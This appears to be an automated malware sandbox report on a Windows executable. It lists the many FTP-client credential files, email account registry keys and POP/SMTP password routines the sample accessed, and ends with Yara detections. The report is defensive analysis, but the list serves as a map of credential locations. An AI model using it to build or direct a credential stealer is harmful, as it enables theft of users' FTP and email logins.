Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\NetSarang\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CuteFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CuteFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SmartFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\TurboFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\Frigate3\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\AceBIT\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\TurboFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTP Explorer\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\AceBIT\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTPRush\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\BlazeFtp\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\FTPGetter\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\AceBIT\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FTPRush\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Windows\32BitFtp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\4\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\3D-FTP\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Frigate3\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\NetSarang\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FTPRush\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\3\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\FlashFXP\4\History.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Windows\wcx_ftp.ini Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\ Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat Jump to behavior
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword 1_2_0040E9CE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword 1_2_0040E9CE

Remote Access Functionality

Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR